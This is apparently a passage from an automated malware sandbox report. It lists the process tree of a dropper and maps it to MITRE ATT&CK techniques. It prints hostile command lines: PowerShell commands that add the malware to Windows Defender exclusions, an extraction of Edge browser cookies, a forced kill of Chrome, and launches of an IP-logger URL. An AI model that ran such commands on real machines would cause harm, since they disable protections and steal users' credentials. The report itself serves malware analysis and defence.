    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1476,8714181253719322008,10863603093861555344,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5012 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3712
- C:\Users\Admin\AppData\Local\Temp\Process.exe
  "C:\Users\Admin\AppData\Local\Temp\Process.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2184
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processes.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processes.exe"
    3⤵
    - UAC bypass
    - Windows security bypass
    - Checks computer location settings
    - Executes dropped EXE
    - Windows security modification
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Suspicious use of SetThreadContext
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - System policy modification
    PID:3864
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processes.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5856
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3276
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Processes.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5300
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\mirzas\svchost.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3088
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe"
      4⤵
      PID:5304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:5248
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"
      4⤵
      PID:860
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4444
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Ajhp7
    3⤵
    PID:5876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdfe2f46f8,0x7ffdfe2f4708,0x7ffdfe2f4718
      4⤵
      PID:5256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Ajhp7
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdfe2f46f8,0x7ffdfe2f4708,0x7ffdfe2f4718
    3⤵
    PID:1072
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,9807161710880054681,2421527097742472124,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6096
- C:\Users\Admin\AppData\Local\Temp\Folder.exe
  "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1608
- - C:\Users\Admin\AppData\Local\Temp\Folder.exe
    "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -u
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1348
- C:\Users\Admin\AppData\Local\Temp\RobCleanerInstlSo22812.exe
  "C:\Users\Admin\AppData\Local\Temp\RobCleanerInstlSo22812.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4912
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4912 -s 1484
    3⤵
    - Program crash
    PID:5772
- C:\Users\Admin\AppData\Local\Temp\askinstall492.exe
  "C:\Users\Admin\AppData\Local\Temp\askinstall492.exe"
  2⤵
  - Executes dropped EXE
  - Drops Chrome extension
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3124
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c taskkill /f /im chrome.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3192
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5696
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    3⤵
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:5228
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffdebb6cc40,0x7ffdebb6cc4c,0x7ffdebb6cc58
      4⤵
      PID:5892
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1980,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1972 /prefetch:2
      4⤵
      PID:4256
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1796,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2080 /prefetch:3
      4⤵
      PID:5476
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2324,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2596 /prefetch:8
      4⤵
      PID:5716
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3176 /prefetch:1
      4⤵
      PID:3440
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:1
      4⤵
      PID:1944
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4600 /prefetch:1
      4⤵
      PID:5052
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4820,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4804 /prefetch:8
      4⤵
      PID:2440
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:8
      4⤵
      PID:4968
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4536,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4736 /prefetch:8
      4⤵
      PID:2440
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4940,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4928 /prefetch:8
      4⤵
      PID:4552
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:8
      4⤵
      PID:3496
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5308,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5316 /prefetch:8
      4⤵
      PID:6172
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5312,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5368 /prefetch:8
      4⤵
      PID:6256
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5508,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5516 /prefetch:8
      4⤵
      PID:6696
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4908,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4904 /prefetch:2
      4⤵
      PID:6768
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5180,i,16591435824839576936,8791024900983705745,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5684
- C:\Users\Admin\AppData\Local\Temp\File.exe
  "C:\Users\Admin\AppData\Local\Temp\File.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:3764
- C:\Users\Admin\AppData\Local\Temp\Files.exe
  "C:\Users\Admin\AppData\Local\Temp\Files.exe"
  2⤵
  - Executes dropped EXE
  PID:628
- - C:\Users\Admin\AppData\Local\Temp\11111.exe
    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5668
- - C:\Users\Admin\AppData\Local\Temp\11111.exe
    C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5648

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4912 -ip 4912
1⤵
PID:5996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:3864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:5696

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery